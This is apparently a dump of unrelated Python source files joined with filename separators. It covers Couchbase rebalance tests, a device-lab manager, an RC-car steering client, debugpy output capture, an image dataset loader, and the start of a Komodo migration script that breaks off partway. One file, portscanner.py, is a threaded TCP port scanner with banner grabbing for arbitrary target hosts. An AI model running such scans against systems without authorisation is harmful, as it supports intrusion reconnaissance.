ClusterOperationHelper._wait_warmup_completed(self, [master], bucket, wait_time=600)
i = 0
# we expect that rebalance will be failed
try:
rest.monitorRebalance()
except RebalanceFailedException:
# retry rebalance if it failed
self.log.warning("Rebalance failed but it's expected")
SwapRebalanceBase.sleep(self, 30)
self.assertFalse(RestHelper(rest).is_cluster_rebalanced(), msg="cluster need rebalance")
knownNodes = rest.node_statuses();
self.log.info("nodes are still in cluster: {0}".format([(node.ip, node.port) for node in knownNodes]))
ejectedNodes = list(set(optNodesIds) & {node.id for node in knownNodes})
rest.rebalance(otpNodes=[node.id for node in knownNodes], ejectedNodes=ejectedNodes)
SwapRebalanceBase.sleep(self, 10, "Wait for rebalance to start")
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(toBeEjectedNodes))
else:
self.log.info("rebalance completed successfully")
SwapRebalanceBase.verification_phase(self, master)
@staticmethod
def _add_back_failed_node(self, do_node_cleanup=False):
master = self.servers[0]
rest = RestConnection(master)
creds = self.input.membase_settings
self.log.info("CREATE BUCKET PHASE")
SwapRebalanceBase.create_buckets(self)
# Cluster all servers
self.log.info("INITIAL REBALANCE PHASE")
status, servers_rebalanced = RebalanceHelper.rebalance_in(self.servers, len(self.servers) - 1)
self.assertTrue(status, msg="Rebalance was failed")
self.log.info("DATA LOAD PHASE")
self.loaders = SwapRebalanceBase.start_load_phase(self, master)
# Wait till load phase is over
SwapRebalanceBase.stop_load(self.loaders, do_stop=False)
self.log.info("DONE LOAD PHASE")
# Start the swap rebalance
current_nodes = RebalanceHelper.getOtpNodeIds(master)
self.log.info("current nodes : {0}".format(current_nodes))
toBeEjectedNodes = RebalanceHelper.pick_nodes(master, howmany=self.failover_factor)
optNodesIds = [node.id for node in toBeEjectedNodes]
# List of servers that will not be failed over
not_failed_over = []
for server in self.servers:
if self.cluster_run:
if server.port not in [node.port for node in toBeEjectedNodes]:
not_failed_over.append(server)
self.log.info("Node {0}:{1} not failed over".format(server.ip, server.port))
else:
if server.ip not in [node.ip for node in toBeEjectedNodes]:
not_failed_over.append(server)
self.log.info("Node {0}:{1} not failed over".format(server.ip, server.port))
if self.fail_orchestrator:
status, content = ClusterOperationHelper.find_orchestrator(master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}".\
format(status, content))
# When swapping all the nodes
if self.num_swap is len(current_nodes):
optNodesIds.append(content)
else:
optNodesIds[0] = content
master = not_failed_over[-1]
self.log.info("DATA ACCESS PHASE")
self.loaders = SwapRebalanceBase.start_access_phase(self, master)
# Failover selected nodes
for node in optNodesIds:
self.log.info("failover node {0} and rebalance afterwards".format(node))
rest.fail_over(node)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], \
ejectedNodes=optNodesIds)
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(optNodesIds))
# Add back the same failed over nodes
# Cleanup the node, somehow
# TODO: cluster_run?
if do_node_cleanup:
pass
# Make rest connection with node part of cluster
rest = RestConnection(master)
# Given the optNode, find ip
add_back_servers = []
nodes = rest.get_nodes()
for server in nodes:
if isinstance(server.ip, str):
add_back_servers.append(server)
final_add_back_servers = []
for server in self.servers:
if self.cluster_run:
if server.port not in [serv.port for serv in add_back_servers]:
final_add_back_servers.append(server)
else:
if server.ip not in [serv.ip for serv in add_back_servers]:
final_add_back_servers.append(server)
for server in final_add_back_servers:
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster"
self.assertTrue(otpNode, msg.format(server.ip))
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], ejectedNodes=[])
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(add_back_servers))
SwapRebalanceBase.verification_phase(self, master)
@staticmethod
def _failover_swap_rebalance(self):
master = self.servers[0]
rest = RestConnection(master)
creds = self.input.membase_settings
num_initial_servers = self.num_initial_servers
intial_severs = self.servers[:num_initial_servers]
self.log.info("CREATE BUCKET PHASE")
SwapRebalanceBase.create_buckets(self)
# Cluster all starting set of servers
self.log.info("INITIAL REBALANCE PHASE")
status, servers_rebalanced = RebalanceHelper.rebalance_in(intial_severs, len(intial_severs) - 1)
self.assertTrue(status, msg="Rebalance was failed")
self.log.info("DATA LOAD PHASE")
self.loaders = SwapRebalanceBase.start_load_phase(self, master)
# Wait till load phase is over
SwapRebalanceBase.stop_load(self.loaders, do_stop=False)
self.log.info("DONE LOAD PHASE")
# Start the swap rebalance
self.log.info("current nodes : {0}".format(RebalanceHelper.getOtpNodeIds(master)))
toBeEjectedNodes = RebalanceHelper.pick_nodes(master, howmany=self.failover_factor)
optNodesIds = [node.id for node in toBeEjectedNodes]
if self.fail_orchestrator:
status, content = ClusterOperationHelper.find_orchestrator(master)
self.assertTrue(status, msg="Unable to find orchestrator: {0}:{1}".\
format(status, content))
optNodesIds[0] = content
self.log.info("FAILOVER PHASE")
# Failover selected nodes
for node in optNodesIds:
self.log.info("failover node {0} and rebalance afterwards".format(node))
rest.fail_over(node)
self.assertTrue(rest.monitorRebalance(),
msg="failed after failover of {0}".format(node))
new_swap_servers = self.servers[num_initial_servers:num_initial_servers + self.failover_factor]
for server in new_swap_servers:
otpNode = rest.add_node(creds.rest_username, creds.rest_password, server.ip, server.port)
msg = "unable to add node {0} to the cluster"
self.assertTrue(otpNode, msg.format(server.ip))
if self.fail_orchestrator:
rest = RestConnection(new_swap_servers[0])
master = new_swap_servers[0]
self.log.info("DATA ACCESS PHASE")
self.loaders = SwapRebalanceBase.start_access_phase(self, master)
rest.rebalance(otpNodes=[node.id for node in rest.node_statuses()], \
ejectedNodes=optNodesIds)
self.assertTrue(rest.monitorRebalance(),
msg="rebalance operation failed after adding node {0}".format(new_swap_servers))
SwapRebalanceBase.verification_phase(self, master)
class SwapRebalanceBasicTests(unittest.TestCase):
def setUp(self):
SwapRebalanceBase.common_setup(self)
def tearDown(self):
SwapRebalanceBase.common_tearDown(self)
def do_test(self):
SwapRebalanceBase._common_test_body_swap_rebalance(self, do_stop_start=False)
class SwapRebalanceStartStopTests(unittest.TestCase):
def setUp(self):
SwapRebalanceBase.common_setup(self)
def tearDown(self):
SwapRebalanceBase.common_tearDown(self)
def do_test(self):
SwapRebalanceBase._common_test_body_swap_rebalance(self, do_stop_start=True)
class SwapRebalanceFailedTests(unittest.TestCase):
def setUp(self):
SwapRebalanceBase.common_setup(self)
def tearDown(self):
SwapRebalanceBase.common_tearDown(self)
def test_failed_swap_rebalance(self):
self.percentage_progress = self.input.param("percentage_progress", 50)
SwapRebalanceBase._common_test_body_failed_swap_rebalance(self)
# Not cluster_run friendly, yet
def test_add_back_failed_node(self):
SwapRebalanceBase._add_back_failed_node(self, do_node_cleanup=False)
def test_failover_swap_rebalance(self):
SwapRebalanceBase._failover_swap_rebalance(self)
|
device_manager.py
|
#!/usr/bin/env python
##############################################################################
# Copyright 2020-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import time
from bridge.db import DBDriver
from get_connected_devices import GetConnectedDevices
from platforms.android.adb import ADB
from platforms.platforms import getDeviceList
from reboot_device import reboot as reboot_device
from threading import Thread, RLock
from typing import Dict
from utils.custom_logger import getLogger
REBOOT_INTERVAL = datetime.timedelta(hours=8)
MINIMUM_DM_INTERVAL = 10
DEFAULT_DM_INTERVAL = 10
def getDevicesString(devices):
device_list = [d["kind"] + "|"
+ d["hash"] + "|" + d["name"] + "|"
+ d["abi"] + "|" + d["os"] + "|"
+ ("1" if d["available"]
else "0" if d["live"] else "2")
for d in devices]
devices_str = ",".join(device_list)
return devices_str
def valid_dm_interval(arg) -> int:
try:
value = int(arg)
if value < MINIMUM_DM_INTERVAL:
raise ValueError()
except ValueError:
getLogger().warning("Logging interval must be specified as an integer in seconds >= {}. Using default {}s.".format(MINIMUM_DM_INTERVAL,DEFAULT_DM_INTERVAL))
value = DEFAULT_DM_INTERVAL
return value
class DeviceManager(object):
"""
Provides devices metadata to the lab instance. For mobile platforms, checks connectivity of devices and performs updates to lab devices and db.
"""
def __init__(self, args: Dict, db: DBDriver):
self.args = args
self.db: DBDriver = db
self.lab_devices = {}
self.online_devices = None
self._initializeDevices()
self.running = True
self.device_monitor_interval = self.args.device_monitor_interval
self.device_monitor=Thread(target=self._runDeviceMonitor)
self.device_monitor.start()
if self.args.usb_hub_device_mapping:
from utils.usb_controller import USBController
self.usb_controller = USBController(self.args.usb_hub_device_mapping)
else:
self.usb_controller = None
def getLabDevices(self):
""" Return a reference to the lab's device meta data. """
return self.lab_devices
def _runDeviceMonitor(self):
while self.running:
# if the lab is hosting mobile devices, thread will monitor connectivity of devices.
if self.args.platform.startswith("android") or self.args.platform.startswith("ios"):
self._checkDevices()
self._updateHeartbeats()
time.sleep(self.device_monitor_interval)
def _checkDevices(self):
""" Run any device health checks, e.g. connectivity, battery, etc. """
try:
online_hashes = getDeviceList(self.args, silent=True)
offline_devices = [device for device in self.online_devices if device["hash"] not in online_hashes]
new_devices = [h for h in online_hashes if h not in [p["hash"] for p in self.online_devices]]
if offline_devices:
for offline_device in offline_devices:
lab_device = self.lab_devices[offline_device["kind"]][offline_device["hash"]]
usb_disabled = False
if self.usb_controller and not self.usb_controller.active.get(lab_device["hash"], True):
usb_disabled = True
if "rebooting" not in lab_device and not usb_disabled:
getLogger().error("Device {} has become unavailable.".format(offline_device))
self._disableDevice(offline_device)
# TODO: self._sendErrorReport()
if new_devices:
devices=",".join(new_devices)
devices = self._getDevices(devices)
if devices:
for d in devices:
self._enableDevice(d)
if d["hash"] not in [device["hash"] for device in self.online_devices]:
self.online_devices.append(d)
getLogger().info("New device added: {}".format(d))
except BaseException:
getLogger().exception("Error while checking devices.")
def _updateHeartbeats(self):
""" Update device heartbeats for all devices which are marked "live" in lab devices. """
claimer_id = self.args.claimer_id
hashes = []
for k in self.lab_devices:
for hash in self.lab_devices[k]:
if self.lab_devices[k][hash]["live"]:
hashes.append(hash)
hashes = ",".join(hashes)
self.db.updateHeartbeats(claimer_id, hashes)
def _getDevices(self, devices=None):
""" Get list of device meta data for available devices. """
raw_args = []
raw_args.extend(["--platform", self.args.platform])
if self.args.platform_sig:
raw_args.append("--platform_sig")
raw_args.append(self.args.platform_sig)
if devices:
raw_args.append("--devices")
raw_args.append(devices)
elif self.args.devices:
raw_args.append("--devices")
raw_args.append(self.args.devices)
if self.args.hash_platform_mapping:
# if the user provides filename, we will load it.
raw_args.append("--hash_platform_mapping")
raw_args.append(self.args.hash_platform_mapping)
if self.args.device_name_mapping:
# if the user provides filename, we will load it.
raw_args.append("--device_name_mapping")
raw_args.append(self.args.device_name_mapping)
app = GetConnectedDevices(raw_args=raw_args)
devices_json = app.run()
assert devices_json, "Devices cannot be empty"
devices = json.loads(devices_json.strip())
return devices
def _initializeDevices(self):
""" Create device meta data used by lab instance, and update devices in db. """
self.online_devices = self._getDevices()
for k in self.online_devices:
kind = k["kind"]
hash = k["hash"]
name = k["name"]
abi = k["abi"]
os = k["os"]
entry = {
"kind": kind,
"hash": hash,
"name": name,
"abi": abi,
"os": os,
"available": True,
"live": True,
"start_time": None,
"done_time": None,
"output_dir": None,
"job": None,
"adb": ADB(hash, self.args.android_dir),
"reboot_time": datetime.datetime.now() - datetime.timedelta(hours=8),
"usb_hub": {}
}
if kind not in self.lab_devices:
self.lab_devices[kind] = {}
self.lab_devices[kind][hash] = entry
dvs = [self.lab_devices[k][h] for k in self.lab_devices for h in self.lab_devices[k]]
self.db.updateDevices(self.args.claimer_id,
getDevicesString(dvs), True)
def _disableDevice(self, device):
kind = device["kind"]
hash = device["hash"]
entry=self.lab_devices[kind][hash]
entry["available"] = False
entry["live"] = False
self.online_devices.remove(device)
self.db.updateDevices(self.args.claimer_id,
getDevicesString([self.lab_devices[kind][hash]]), False)
def _enableDevice(self, device):
kind = device["kind"]
hash = device["hash"]
name = device["name"]
abi = device["abi"]
os = device["os"]
entry = {
"kind": kind,
"hash": hash,
"name": name,
"abi": abi,
"os": os,
"available": True,
"live": True,
"start_time": None,
"done_time": None,
"output_dir": None,
"job": None,
"adb": ADB(hash, self.args.android_dir),
"reboot_time": datetime.datetime.now() - datetime.timedelta(hours=8),
"usb_hub": {}
}
if kind not in self.lab_devices:
self.lab_devices[kind]={}
self.lab_devices[kind][hash] = entry
self.db.updateDevices(self.args.claimer_id,
getDevicesString([self.lab_devices[kind][hash]]), False)
def _sendErrorReport(self, emsg):
# TODO: send alert to support team to troubleshoot
raise NotImplementedError
def shutdown(self):
self.db.updateDevices(self.args.claimer_id, "", True)
self.running = False
class CoolDownDevice(Thread):
""" Used by AsyncRun to cool device down after benchmark. Will reboot the device if required and add rebooting status to device entry. """
def __init__(self, device, args, db, force_reboot, LOCK: RLock):
Thread.__init__(self)
self.device = device
self.args = args
self.db = db
self.force_reboot = force_reboot
self.LOCK = LOCK
def run(self):
reboot = self.args.reboot and \
(self.force_reboot
or self.device["reboot_time"] + REBOOT_INTERVAL
< datetime.datetime.now())
success = True
# reboot mobile devices if required
if reboot:
raw_args = []
raw_args.extend(["--platform", self.args.platform])
raw_args.extend(["--device", self.device["hash"]])
raw_args.extend(["--android_dir", self.args.android_dir])
self.device["rebooting"] = True
if reboot_device(raw_args=raw_args):
getLogger().info("Device {} was rebooted.".format(self.device))
self.device["reboot_time"] = datetime.datetime.now()
else:
self.device.pop("rebooting")
getLogger().error("Device {} could not be rebooted.".format(self.device))
success = False
# sleep for device cooldown
if self.args.platform.startswith("ios") or self.args.platform.startswith("android"):
getLogger().info("Sleep 180 seconds")
time.sleep(180)
else:
getLogger().info("Sleep 20 seconds")
time.sleep(20)
with self.LOCK:
getLogger().info("CoolDownDevice lock acquired")
# device should be available again, remove rebooting flag.
if "rebooting" in self.device:
del(self.device["rebooting"])
if success:
self.device["available"] = True
device_str = getDevicesString([self.device])
self.db.updateDevices(self.args.claimer_id, device_str, False)
getLogger().info("Device {}({}) available".format(
self.device["kind"], self.device["hash"]))
else:
self.device["live"] = False
getLogger().info("CoolDownDevice lock released")
|
pc_main.py
|
import numpy as np
import cv2
import pygame
import threading
import socketserver
import socket
from queue import Queue
import time
import pandas as pd
from keras.models import model_from_yaml
import os
RUN = True
COLLECT = False
q = Queue(100)
class Control(object):
'keeps track of steering during training'
'parses steering state from neural network'
def __init__(self):
self.mag = 300
self.rate = self.mag / 2
self.third = self.mag / 3
self.range = 2 * (self.mag - self.third)
self.left = self.mag
self.right = self.mag
self.colors = []
def left_pressed(self):
if self.right < self.mag:
self.right += 1
elif self.left > self.third:
self.left -= 1
def right_pressed(self):
if self.left < self.mag:
self.left += 1
elif self.right > self.third:
self.right -= 1
def get_target(self):
if self.left < self.mag:
return self.left
else:
diff = self.mag - self.right
return self.mag + diff
def set_rates(self, y):
if y < 0.0:
y = 0
elif y > 1.0:
y = 1
else :
y = (y * self.range) + self.third
if y < self.mag:
self.left = int(y)
self.right = self.mag
if y == self.mag:
self.left = self.mag
self.right = self.mag
if y > self.mag:
diff = int(y) - self.mag
self.left = self.mag
self.right = self.mag - diff
class VideoStreamHandler(socketserver.StreamRequestHandler):
'parses images as they arrive and pushes them into a queue'
def handle(self):
global RUN, q
fps = []
print("Streaming...")
start_time = time.time()
stream_bytes = bytearray()
while RUN:
stream_bytes += self.rfile.read(1024)
first = stream_bytes.find(b'\xff\xd8')
last = stream_bytes.find(b'\xff\xd9')
if first != -1 and last != -1:
delta_time = time.time() - start_time
fps.append(delta_time)
if len(fps) > 30:
fps.pop(0)
rate = 1/(np.sum(fps)/len(fps))
#print(int(rate))
start_time = time.time()
jpg = stream_bytes[first:last + 2]
stream_bytes = stream_bytes[last + 2:]
arr = np.asarray(jpg, dtype=np.uint8)
image = cv2.imdecode(arr, 1)
q.put(image)
class ImageHandler(object):
'processes images as soon as they arrive'
def __init__(self):
self.control = Control()
self.cnt = 0
self.image = np.zeros((200,66))
self.target = []
if not COLLECT:
self.load_models()
def load_models(self):
os.chdir('results')
yaml_file = open('nvidia.yaml', 'r')
model_yaml = yaml_file.read()
yaml_file.close()
model = model_from_yaml(model_yaml)
model.load_weights('nvidia.h5')
model.compile(loss='mse', optimizer='adam')
self.model = model
self.model._make_predict_function()
os.chdir('..')
def create_csv(self):
df = pd.DataFrame(self.target, columns=['target'])
df.to_csv('images/target.csv', index=False)
def process_image(self):
'receives images. either stores images or evaluates using nn model'
if q.empty() is False:
image = q.get()
#image is bgr format
image = np.rot90(image, k=2)
self.image = image
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
blue_lower = np.array([ 80, 0, 0])
blue_upper = np.array([120,255,255])
mask = cv2.inRange(hsv, blue_lower, blue_upper)
blue_image = cv2.bitwise_and(image, image, mask=mask)
if COLLECT:
cv2.imwrite('images/color/image_'+str(self.cnt)+'.jpeg', image)
cv2.imwrite('images/gray/image_'+str(self.cnt)+'.jpeg', gray)
cv2.imwrite('images/blue/image_'+str(self.cnt)+'.jpeg', blue_image)
self.target.append(self.control.get_target())
self.cnt += 1
else:
rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
X = rgb.astype(np.float32).reshape(1, 66, 200, 3)
y = self.model.predict(X)[0][0]
self.control.set_rates(y)
return True
else:
return False
def query_keyboard(self):
'checks which arrow keys are pressed and updates steering'
keys = pygame.key.get_pressed()
if keys[pygame.K_LEFT]:
self.control.left_pressed()
if keys[pygame.K_RIGHT]:
self.control.right_pressed()
left_rate = str(self.control.left)
right_rate = str(self.control.right)
msg = 'L'+left_rate+'R'+right_rate+'E'
self.client_socket.sendall(str.encode(msg))
def update_loop(self, host, port):
'checks for new images and pushes to pygame windows'
'queries keyboard and sends relevant messages to rpi'
self.client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client_socket.connect((host, port))
pygame.init()
screen = pygame.display.set_mode((200,66))
key_time = time.time()
img_time = time.time()
global RUN, q
try:
while RUN:
current = time.time()
'checks for new images and updates display: 100 hertz'
if current - img_time > 1/100:
new_image = self.process_image()
if new_image:
screen.fill([0,0,0])
frame = self.image
frame = cv2.cvtColor(self.image, cv2.COLOR_BGR2RGB)
frame = cv2.flip(frame, 0)
frame = np.rot90(frame, k=3)
frame = pygame.surfarray.make_surface(frame)
screen.blit(frame, (0,0))
pygame.display.update()
img_time = current
'updates drive state: 150 hertz'
if current - key_time > 1/self.control.rate:
self.query_keyboard()
key_time = current
for event in pygame.event.get():
if event.type == pygame.QUIT:
RUN = False
finally:
if COLLECT:
self.create_csv()
self.client_socket.close()
cv2.destroyAllWindows()
pygame.quit()
class ManageTCPServer(object):
'allows for tcp server to be shutdown from main'
def setup_server(self, host, port):
self.server = socketserver.TCPServer(server_address=(host, port),
RequestHandlerClass=VideoStreamHandler)
self.server.serve_forever()
def shutdown_server(self):
self.server.shutdown()
if __name__ == '__main__':
manager = ManageTCPServer()
video_thread = threading.Thread(target=manager.setup_server, args=('computer_ip_address', 8000))
video_thread.start()
ih = ImageHandler()
while True:
if q.empty() is False:
master_thread = threading.Thread(target=ih.update_loop, args=('rpi_ip_address', 8001))
master_thread.start()
break
master_thread.join()
manager.shutdown_server()
|
portscanner.py
|
import optparse
from socket import *
from threading import *
screenLock = Semaphore(value=1)
def connScan(tgtHost, tgtPort):
try:
connSkt = socket(AF_INET, SOCK_STREAM)
connSkt.connect((tgtHost, tgtPort))
connSkt.send('ViolentPython\r\n')
results = connSkt.recv(100)
screenLock.acquire()
print '[+] %d/tcp open'% tgtPort
print '[+] ' + str(results)
except:
screenLock.acquire()
print '[-] %d/tcp closed'% tgtPort
finally:
screenLock.release()
connSkt.close()
def protScan(tgtHost, tgtPorts):
try:
tgtIP = gethostbyname(tgtHost)
except:
print '[-] Cannot resolve "%s": Unknown host'%tgtHost
return
try:
tgtName = gethostbyaddr(tgtIP)
print '\n[+] Scan Results for: ' + tgtName[0]
except Exception as e:
print '\n[+] Scan Results for: ' + tgtIP
setdefaulttimeout(1)
for tgtPort in tgtPorts:
t = Thread(target=connScan, args=(tgtHost, int(tgtPort)))
t.start()
#print 'Scanning port: ' + tgtPort
#connScan(tgtHost, int(tgtPort))
def main():
parser = optparse.OptionParser('usage%prog -H <target host> -p <target port>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-p', dest='tgtPort', type='string', help='specify target port[s] separated by comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if (tgtHost == None) | (tgtPorts[0] == None):
print '[-] You must specify a target host and port[s].'
exit(0)
protScan(tgtHost, tgtPorts)
if __name__ == '__main__':
main()
|
output.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import os
import re
import threading
from debugpy.common import fmt, log
class CapturedOutput(object):
"""Captures stdout and stderr of the debugged process.
"""
def __init__(self, session, **fds):
self.session = session
self._lock = threading.Lock()
self._chunks = {}
self._worker_threads = []
for stream_name, fd in fds.items():
log.info("Capturing {0} {1}", session.debuggee_id, stream_name)
self._capture(fd, stream_name)
def __str__(self):
return fmt("CapturedOutput[{0}]", self.session.id)
def _worker(self, fd, name):
chunks = self._chunks[name]
try:
while True:
try:
chunk = os.read(fd, 0x1000)
except Exception:
break
if not len(chunk):
break
lines = "\n".join(
repr(line) for line, _ in re.findall(b"(.+?(\n|$))", chunk)
)
log.info("{0} {1}:\n{2}", self.session.debuggee_id, name, lines)
with self._lock:
chunks.append(chunk)
finally:
os.close(fd)
def _capture(self, fd, name):
assert name not in self._chunks
self._chunks[name] = []
thread = threading.Thread(
target=lambda: self._worker(fd, name), name=fmt("{0} {1}", self, name)
)
thread.daemon = True
thread.start()
self._worker_threads.append(thread)
def wait(self, timeout=None):
"""Wait for all remaining output to be captured.
"""
if not self._worker_threads:
return
log.debug("Waiting for remaining {0} output...", self.session.debuggee_id)
for t in self._worker_threads:
t.join(timeout)
self._worker_threads[:] = []
def _output(self, which, encoding, lines):
try:
result = self._chunks[which]
except KeyError:
raise AssertionError(
fmt("{0} was not captured for {1}", which, self.session.debuggee_id)
)
with self._lock:
result = b"".join(result)
if encoding is not None:
result = result.decode(encoding)
return result.splitlines() if lines else result
def stdout(self, encoding=None):
"""Returns stdout captured from the debugged process, as a single string.
If encoding is None, returns bytes. Otherwise, returns unicode.
"""
return self._output("stdout", encoding, lines=False)
def stderr(self, encoding=None):
"""Returns stderr captured from the debugged process, as a single string.
If encoding is None, returns bytes. Otherwise, returns unicode.
"""
return self._output("stderr", encoding, lines=False)
def stdout_lines(self, encoding=None):
"""Returns stdout captured from the debugged process, as a list of lines.
If encoding is None, each line is bytes. Otherwise, each line is unicode.
"""
return self._output("stdout", encoding, lines=True)
def stderr_lines(self, encoding=None):
"""Returns stderr captured from the debugged process, as a list of lines.
If encoding is None, each line is bytes. Otherwise, each line is unicode.
"""
return self._output("stderr", encoding, lines=True)
|
dataset.py
|
# -*- coding: utf-8 -*-
import os
import os.path
from queue import Queue
from threading import Thread
import cv2
import torch
import torch.utils.data
import numpy as np
from histogram import match_histograms
def get_loader(my_dataset, device, batch_size, num_workers, shuffle):
""" 根据dataset及设置,获取对应的 DataLoader """
my_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=num_workers,
shuffle=shuffle, pin_memory=True, persistent_workers=(num_workers > 0))
# if torch.cuda.is_available():
# my_loader = CudaDataLoader(my_loader, device=device)
return my_loader
class MatchHistogramsDataset(torch.utils.data.Dataset):
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
def __init__(self, root, transform=None, target_transform=None, is_match_histograms=False, match_mode=True,
b2a_prob=0.5, match_ratio=1.0):
""" 获取指定的两个文件夹下,两张图像numpy数组的Dataset """
assert len(root) == 2, f'root of MatchHistogramsDataset must has two dir!'
self.dataset_0 = DatasetFolder(root[0])
self.dataset_1 = DatasetFolder(root[1])
self.transform = transform
self.target_transform = target_transform
self.len_0 = len(self.dataset_0)
self.len_1 = len(self.dataset_1)
self.len = max(self.len_0, self.len_1)
self.is_match_histograms = is_match_histograms
self.match_mode = match_mode
assert self.match_mode in ('hsv', 'hsl', 'rgb'), f'match mode must in {self.match_mode}'
self.b2a_prob = b2a_prob
self.match_ratio = match_ratio
def __getitem__(self, index):
sample_0 = self.dataset_0[index] if index < self.len_0 else self.dataset_0[np.random.randint(self.len_0)]
sample_1 = self.dataset_1[index] if index < self.len_1 else self.dataset_1[np.random.randint(self.len_1)]
if self.is_match_histograms:
if self.match_mode == 'hsv':
sample_0 = cv2.cvtColor(sample_0, cv2.COLOR_RGB2HSV_FULL)
sample_1 = cv2.cvtColor(sample_1, cv2.COLOR_RGB2HSV_FULL)
elif self.match_mode == 'hsl':
sample_0 = cv2.cvtColor(sample_0, cv2.COLOR_RGB2HLS_FULL)
sample_1 = cv2.cvtColor(sample_1, cv2.COLOR_RGB2HLS_FULL)
if np.random.rand() < self.b2a_prob:
sample_1 = match_histograms(sample_1, sample_0, rate=self.match_ratio)
else:
sample_0 = match_histograms(sample_0, sample_1, rate=self.match_ratio)
if self.match_mode == 'hsv':
sample_0 = cv2.cvtColor(sample_0, cv2.COLOR_HSV2RGB_FULL)
sample_1 = cv2.cvtColor(sample_1, cv2.COLOR_HSV2RGB_FULL)
elif self.match_mode == 'hsl':
sample_0 = cv2.cvtColor(sample_0, cv2.COLOR_HLS2RGB_FULL)
sample_1 = cv2.cvtColor(sample_1, cv2.COLOR_HLS2RGB_FULL)
if self.transform is not None:
sample_0 = self.transform(sample_0)
sample_1 = self.transform(sample_1)
return sample_0, sample_1
def __len__(self):
return self.len
def __repr__(self):
fmt_str = f'MatchHistogramsDataset for: \n' \
f'{self.dataset_0.__repr__()} \n ' \
f'{self.dataset_1.__repr__()}'
return fmt_str
class DatasetFolder(torch.utils.data.Dataset):
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
def __init__(self, root, transform=None):
""" 获取指定文件夹下,单张图像numpy数组的Dataset """
samples = []
for sub_root, _, filenames in sorted(os.walk(root)):
for filename in sorted(filenames):
if os.path.splitext(filename)[-1].lower() in self.IMG_EXTENSIONS:
path = os.path.join(sub_root, filename)
samples.append(path)
if len(samples) == 0:
raise RuntimeError(f"Found 0 files in sub-folders of: {root}\n"
f"Supported extensions are: {','.join(self.IMG_EXTENSIONS)}")
self.root = root
self.samples = samples
self.transform = transform
def __getitem__(self, index):
path = self.samples[index]
sample = cv2.imread(path)[..., ::-1]
if self.transform is not None:
sample = self.transform(sample)
return sample
def __len__(self):
return len(self.samples)
def __repr__(self):
fmt_str = f'Dataset {self.__class__.__name__}\n'\
f' Number of data points: {self.__len__()}\n'\
f' Root Location: {self.root}\n'
tmp = ' Transforms (if any): '
trans_tmp = self.transform.__repr__().replace('\n', '\n' + ' ' * len(tmp))
fmt_str += f'{tmp}{trans_tmp}'
return fmt_str
class CudaDataLoader:
""" 异步预先将数据从CPU加载到GPU中 """
def __init__(self, loader, device, queue_size=2):
self.device = device
self.queue_size = queue_size
self.loader = loader
self.load_stream = torch.cuda.Stream(device=device)
self.queue = Queue(maxsize=self.queue_size)
self.idx = 0
self.worker = Thread(target=self.load_loop)
self.worker.setDaemon(True)
self.worker.start()
def load_loop(self):
""" 不断的将cuda数据加载到队列里 """
# The loop that will load into the queue in the background
torch.cuda.set_device(self.device)
while True:
for i, sample in enumerate(self.loader):
self.queue.put(self.load_instance(sample))
def load_instance(self, sample):
""" 将batch数据从CPU加载到GPU中 """
if torch.is_tensor(sample):
with torch.cuda.stream(self.load_stream):
return sample.to(self.device, non_blocking=True)
elif sample is None or type(sample) in (list, str):
return sample
elif isinstance(sample, dict):
return {k: self.load_instance(v) for k, v in sample.items()}
else:
return [self.load_instance(s) for s in sample]
def __iter__(self):
self.idx = 0
return self
def __next__(self):
# 加载线程挂了
if not self.worker.is_alive() and self.queue.empty():
self.idx = 0
self.queue.join()
self.worker.join()
raise StopIteration
# 一个epoch加载完了
elif self.idx >= len(self.loader):
self.idx = 0
raise StopIteration
# 下一个batch
else:
out = self.queue.get()
self.queue.task_done()
self.idx += 1
return out
def next(self):
return self.__next__()
def __len__(self):
return len(self.loader)
@property
def sampler(self):
return self.loader.sampler
@property
def dataset(self):
return self.loader.dataset
|
pymigrate_v2.py
|
#!/usr/bin/env python3
from slickrpc import Proxy
import queue
from threading import Thread
import threading
import time
from slickrpc import Proxy
import sys
import datetime
import os
import json
import re
import platform
import calendar
def selectRangeInt(low,high, msg):
while True:
try:
number = int(input(msg))
except ValueError:
print("integer only, try again")
continue
if low <= number <= high:
return number
else:
print("input outside range, try again")
def selectRangeFloat(low,high, msg):
while True:
try:
number = float(input(msg))
except ValueError:
print("integer only, try again")
continue
if low <= number <= high:
return number
else:
print("input outside range, try again")
# define function that fetchs rpc creds from .conf
def def_credentials(chain):
rpcport ='';
operating_system = platform.system()
if operating_system == 'Darwin':
ac_dir = os.environ['HOME'] + '/Library/Application Support/Komodo'
elif operating_system == 'Linux':
ac_dir = os.environ['HOME'] + '/.komodo'
elif operating_system == 'Win64':
ac_dir = "dont have windows machine now to test"
if chain == 'KMD':
coin_config_file = str(ac_dir + '/komodo.conf')
else:
coin_config_file = str(ac_dir + '/' + chain + '/' + chain + '.conf')
with open(coin_config_file, 'r') as f:
for line in f:
l = line.rstrip()
if re.search('rpcuser', l):
rpcuser = l.replace('rpcuser=', '')
elif re.search('rpcpassword', l):
